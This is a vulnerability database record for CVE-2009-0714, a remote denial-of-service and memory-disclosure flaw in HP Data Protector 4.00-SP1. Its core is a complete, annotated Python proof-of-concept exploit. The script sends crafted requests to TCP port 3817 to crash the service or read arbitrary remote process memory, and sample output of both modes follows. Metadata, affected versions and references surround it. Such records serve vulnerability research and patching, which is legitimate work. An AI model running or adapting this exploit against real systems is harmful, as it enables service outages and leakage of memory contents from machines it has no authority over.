ID
VAR-E-200905-0328
CVE
cve_id: | CVE-2009-0714 | Trust: 2.4 |
EDB ID
9006
TITLE
HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Denial of Service - Windows dos Exploit
Trust: 0.6
DESCRIPTION
HP Data Protector 4.00-SP1b43064 - Remote Memory Leak/Denial of Service. CVE-2009-0714, CVE-54509. DoS exploit for the Windows platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | hp | model: | data protector 4.00-sp1b43064 | scope: | - | version: | - | Trust: 1.6 |
vendor: | hp | model: | data protector 4.00-sp1 | scope: | eq | version: | 43064 | Trust: 0.5 |
vendor: | hp | model: | data protector express sse | scope: | eq | version: | 4.x | Trust: 0.3 |
vendor: | hp | model: | data protector express sse | scope: | eq | version: | 3.x | Trust: 0.3 |
vendor: | hp | model: | data protector express | scope: | eq | version: | 4.x | Trust: 0.3 |
vendor: | hp | model: | data protector express | scope: | eq | version: | 3.x | Trust: 0.3 |
EXPLOIT
#!/usr/bin/env python
#POC Memory disclosure/ Denial Of Service
#HP Data protector 4.00-sp1 43064
#Tested for Windows Version Only
'''
Buggy code @dpwinsup module of dpwingad process running at 3817/TCP port dpwinsup.10275F80
100DDE89 8B15 54A72210 MOV EDX,DWORD PTR DS:[1022A754]
100DDE8F 8B82 98650000 MOV EAX,DWORD PTR DS:[EDX+6598]
100DDE95 8B4C24 54 MOV ECX,DWORD PTR SS:[ESP+54] ;ECX = user controlled data
100DDE99 8D1481 LEA EDX,DWORD PTR DS:[ECX+EAX*4] ;EDX = if invalid/valid offset
100DDE9C 8B3495 F0A42210 MOV ESI,DWORD PTR DS:[EDX*4+1022A4F0] ;Crash/Memory Leak
100DDEA3 83C4 1C ADD ESP,1C
100DDEA6 897424 10 MOV DWORD PTR SS:[ESP+10],ESI
'''
import socket
import sys
import struct
import time
import getopt
# Request template used by this PoC: four 32-bit fields (read little-endian:
# 0x8454, 0, 6, 0x92) followed by the literal "data", which both exploit
# functions replace with 130 bytes of "A" before sending. The meaning of the
# four header fields is not documented in this listing; the values are kept
# exactly as the original PoC had them.
# For defenders: the traffic this script produces is a TCP connection to
# `port` carrying this fixed 16-byte header followed by 130 bytes of 0x41
# (with four bytes at offset 32 overwritten in the memory-read variant).
bf = ("\x54\x84\x00\x00" +
      "\x00\x00\x00\x00" +
      "\x06\x00\x00\x00" +
      "\x92\x00\x00\x00" +
      "data")
# Only `port` is actually used (as a module global) by exploit_memory() and
# dos_yosemite(); `ip` and `addr` are not referenced by any function below --
# the host comes from the -t/--target option handled in main().
ip = '192.168.0.14'
port = 3817
addr = (ip,port)
# Start of the range main() reads when -e 1 is given: 80 bytes (0x50) from
# here in 4-byte steps. The original comment identifies this as the Windows
# PEB address on the author's test system.
mem_addr = 0x7ffdf000 #PEB for windows
# When True, exploit_memory() hex-dumps every byte of the server's reply.
DEBUG = False
def exploit_memory(ip_addr,read_mem):
    """Read one 32-bit value from the remote process at address read_mem.

    Information-disclosure half of the PoC. According to the author's
    annotations on the disassembly at the top of the file, the server
    performs a lookup of the form [EDX*4 + 0x1022A4F0] where EDX is derived
    from a request field without any bounds check. This function chooses
    that field so the lookup resolves to read_mem and returns the 4 bytes
    found at reply offset 32, which the sample run at the bottom of the
    file shows reflect the remote memory.

    ip_addr:  host to connect to; the port is the module-level `port`.
    read_mem: absolute address (int) in the remote process to read.
    Returns the little-endian unsigned 32-bit value at read_mem (int).
    Raises socket.error on connect/send/recv failure and struct.error when
    the reply is shorter than 36 bytes (e.g. the service has already died)
    or when the computed index does not fit an unsigned 32-bit field.
    The socket is not closed on any of those error paths.
    """
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip_addr,port))
    # 16-byte header from `bf` followed by 130 filler bytes.
    reqst = bf.replace("data","A"*130)
    #t = ((addr-1022AC80)/4 - 4)
    # Index that makes the server's [EDX*4 + 0x1022A4F0] lookup land on
    # read_mem. The constant is the table base from the disassembly; the
    # "- 4" presumably offsets the EAX*4 term added by the LEA at 100DDE99
    # -- that part cannot be confirmed from the listing alone.
    # Python 2 integer division is relied on here; a read_mem below the
    # table base gives a negative t, which struct.pack("<L") rejects on 2.7.
    t = ((read_mem-0x1022A4F0)/4 - 4)
    print "0x%x" % t
    # The index is written at request offset 32..36, i.e. inside the filler.
    reqst = reqst[0:32] + struct.pack("<L",t) + reqst[36:]
    s.send(reqst)
    resp = s.recv(1000)
    # The leaked value is taken from the same offset (32..36) of the reply.
    leak = struct.unpack("<L",resp[32:36])
    #print type(leak[0])
    if DEBUG:
        # Hex dump of the whole reply, 16 bytes per row.
        print "Len of resp: %d" % len(resp)
        for i in range(0,len(resp)):
            if i % 16 ==0:
                print
            print "0x%02x" % struct.unpack("<B",resp[i]),
        print
    s.close()
    return leak[0]
def dos_yosemite(ip_addr):
    """Send a single request that makes the remote service crash (DoS).

    Uses the same 16-byte header plus 130 "A" filler bytes as
    exploit_memory() but does not patch the index field, so request offset
    32..36 is "AAAA" (0x41414141). The disassembly at the top of the file
    marks the unchecked lookup with that index as the crash site. Nothing
    is read back; the function returns None and only prints a status line.

    ip_addr: host to connect to; the port is the module-level `port`.
    Raises socket.error if the connection or send fails (the socket is not
    closed on that path).
    """
    print "[*] Sending DOS Exploit."
    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip_addr,port))
    reqst = bf.replace("data","A"*130)
    s.send(reqst)
    #resp = s.recv(1000)
    s.close()
def main():
    """Command-line entry point: parse -t/--target and -e/--exploit, dispatch.

    -e 0 sends the DoS request once via dos_yosemite().
    -e 1 calls exploit_memory() 20 times, reading 80 bytes (0x50) of the
         remote process starting at mem_addr in 4-byte steps, sleeping
         0.5 s between reads and printing each address/value pair.
    Any other -e value, a missing -t, or no options at all prints usage.
    If only -t is given the loop finishes without output and main() returns.

    Indentation was lost in this listing and is reconstructed here; the
    "Target Missing" branch is read as the else of the inner
    `if opt_target in ("-t","--target")`. Read that way the parsing is
    order-dependent: the inner loop rescans `opt` from the start, so when -e
    precedes -t on the command line the first inner pair is the -e option
    itself and the function reports a missing target. (If the original used
    a for/else there instead, that ordering problem does not apply.)
    `int(a)` raises ValueError for a non-numeric -e argument, and `args`
    (positional arguments) is collected but never used.
    """
    try:
        opt, args = getopt.getopt(sys.argv[1:],"ht:e:",["help","target=","exploit="])
        if len(opt)==0:
            usage()
            sys.exit(0)
    except getopt.GetoptError,err:
        # Unknown option or missing argument: report, show usage, exit 2.
        print str(err)
        usage()
        sys.exit(2)
    for o,a in opt:
        if o in ("-h","--help"):
            usage()
            sys.exit()
        elif o in ("-e","--exploit"):
            # Rescan the option list for the target address.
            for opt_target,arg_target in opt:
                if opt_target in ("-t","--target"):
                    if int(a) == 0: # DoS
                        dos_yosemite(arg_target)
                        sys.exit(0)
                    elif int(a) == 1:
                        print "[*] Dumping Memory..{PEB}"
                        for i in range(0,int(0x50),4): #Poc to read the 80bytes from memory
                            # Each call opens a fresh connection; the sleep paces them.
                            leak = exploit_memory(arg_target,mem_addr+i)
                            time.sleep(0.5)
                            print "0x%08x ---> 0x%08x" % ((mem_addr+i),leak)
                        sys.exit()
                    else:
                        print "[*] Unknown Exploit type"
                        usage()
                        sys.exit()
                else:
                    print "[*] Target Missing"
                    usage()
                    sys.exit()
        else:
            # -t on its own: nothing to do until -e is seen.
            continue
def usage():
    """Print the command-line help text to stdout.

    Called by main() on -h/--help, on a getopt error, when no options are
    given, and on an unknown -e value or missing -t. Returns None.
    """
    print "Yosemite DoS and Information Disclosure Exploit"
    #print "Yosemite backup standard v8.7 build 43905 Trial"
    #print "Tested for Windows Versions"
    print "Available Options"
    print "\t -t | --target target address"
    print "\t -e | --exploit { 0 - Dos \ 1 - Memory Leak }"
    print "\n"
# Script entry point; main() handles option parsing and exits via sys.exit().
if __name__=='__main__':
    main()
'''
C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 1
[*] Dumping Memory..{PEB}
0x7ffdf000 ---> 0x0012fbc4
0x7ffdf004 ---> 0x00130000
0x7ffdf008 ---> 0x0012d000
0x7ffdf00c ---> 0x00000000
0x7ffdf010 ---> 0x00001e00
0x7ffdf014 ---> 0x00000000
0x7ffdf018 ---> 0x7ffdf000
0x7ffdf01c ---> 0x00000000
0x7ffdf020 ---> 0x00000c54
0x7ffdf024 ---> 0x00000cfc
0x7ffdf028 ---> 0x00000000
0x7ffdf02c ---> 0x00000000
0x7ffdf030 ---> 0x7ffdb000
0x7ffdf034 ---> 0x00000000
0x7ffdf038 ---> 0x00000000
0x7ffdf03c ---> 0x00000000
0x7ffdf040 ---> 0xe15b42a0
0x7ffdf044 ---> 0x00000000
0x7ffdf048 ---> 0x00000000
0x7ffdf04c ---> 0x00000000
C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 0
[*] Sending DOS Exploit.
'''
# milw0rm.com [2009-06-23]
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Remote Memory Leak/Denial of Service
Trust: 1.0
TAGS
tag: | exploit | Trust: 0.5 |
tag: | denial of service | Trust: 0.5 |
tag: | memory leak | Trust: 0.5 |
CREDITS
Nibin
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2009-0714 | Trust: 2.4 |
db: | EXPLOIT-DB | id: | 9006 | Trust: 1.6 |
db: | EDBNET | id: | 33199 | Trust: 0.6 |
db: | PACKETSTORM | id: | 78610 | Trust: 0.5 |
db: | BID | id: | 34955 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2009-0714 | Trust: 2.1 |
url: | https://www.exploit-db.com/exploits/9006/ | Trust: 0.6 |
url: | http://ivizsecurity.com/security-advisory-iviz-sr-09002.html | Trust: 0.3 |
url: | http://h18000.www1.hp.com/products/storage/software/datapexp/specs.html | Trust: 0.3 |
url: | http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01697543 | Trust: 0.3 |
SOURCES
db: | BID | id: | 34955 |
db: | PACKETSTORM | id: | 78610 |
db: | EXPLOIT-DB | id: | 9006 |
db: | EDBNET | id: | 33199 |
LAST UPDATE DATE
2022-07-27T09:16:46.974000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 34955 | date: | 2009-11-25T20:25:00 |
SOURCES RELEASE DATE
db: | BID | id: | 34955 | date: | 2009-05-13T00:00:00 |
db: | PACKETSTORM | id: | 78610 | date: | 2009-06-24T00:17:14 |
db: | EXPLOIT-DB | id: | 9006 | date: | 2009-06-23T00:00:00 |
db: | EDBNET | id: | 33199 | date: | 2009-06-23T00:00:00 |